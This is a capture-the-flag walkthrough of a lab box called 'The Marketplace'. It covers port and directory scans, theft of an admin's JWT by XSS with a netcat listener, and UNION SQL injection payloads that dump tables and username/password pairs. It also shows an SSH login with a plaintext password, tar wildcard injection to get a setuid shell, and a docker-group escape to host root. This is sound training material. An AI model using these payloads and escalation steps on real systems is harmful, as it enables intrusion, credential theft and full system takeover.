# The Marketplace **Room Link:** ## Initial Scan **Kali** 
nmap -A $VICTIM
## Scan all ports **Kali** 
nmap -sV -sT -O -p 1-65535 $VICTIM
## TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ``` ## TCP/32768 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```
## XSS - Steal JVT
I tried updating the token it didn't work
Next we're going to try to steal the JWT from another user. **Kali** ``` nc -lvnp 4444 ``` **Browser** ``` ```
This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button
we got a token from a user that isn't us
We can see it is from Michael who is an admin.
Sent again but this time just forwarded the request so we could see what that script was doing
The script was printing the flag
This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.
**Brower cookie** ``` eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY ``` We add a order by and increase the number until we get an error to reveal how many fields there are.
After 5 it give us an error so we know there are four fields
We do a union select, first to try to show our 1s which isn't working because the first part of the statement runs successfully so theres no where to put our info
To work around this we make the userid as 0 which probably doesn't exist and we can start seeing our 1s
Get Version
Get Database
Get tables ``` UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database() ```
Get All tables by concat ``` -1 UNION SELECT group_concat(table_name),1,1,1%20 FROM information_schema.tables WHERE table_schema =database() ```
Get Columns for table users ``` -1%20UNION%20SELECT%20group_concat(column_name,column_type),1,1,1%20%20FROM%20information_schema.columns%20WHERE%20table_schema=marketplace ```
Get Columns for table items ``` -1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace' ```
Get Columns for table messages ``` -1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace' ```
Get Columns for table messages ``` -1%20UNION%20SELECT%20group_concat(message_content),1,1,1%20FROM%20messages ```
Get usernames and passwords. The passwords aren't too useful at this point but now we have some usernames. ``` -1%20UNION%20SELECT%20group_concat(username,%27|%27,password),1,1,1%20FROM%20users ```
## TCP/22 - SSH **Kali** ``` ssh jake@$VICTIM Password: @b_ENXkGYUCAv3zJ ```
## **Lateral Movement** **Exploit:** Jake can run a backup script as michael. The script is using a wildcard which we manipulate.
We can trick the script to run this to get a shell by making empty files with similar names
**Victim** ``` cd /opt/backups mkdir priv cd priv touch ./--checkpoint=1 touch ./--checkpoint-action=exec=sh shell.sh vi shell.sh ``` **shell.sh** ``` #!/bin/bash cp /bin/bash /opt/backups/michealbash; chmod +xs /opt/backups/michealbash; ``` **Victim** ``` chmod +x shell.sh rm -f ../backup.tar sudo -u michael /opt/backups/backup.sh ```
## **Privilege Escalation** **Victim(micheal)** ``` id find / -name docker.sock 2>/dev/null docker images docker run -it -v /:/host/ alpine chroot /host/ sh ``` michael is part of the docker group so it appears we're in a pod
There a few images to test from. I just ran the last command above and changes the image name until it worked. Exploit worked with nginx and mysql images as well.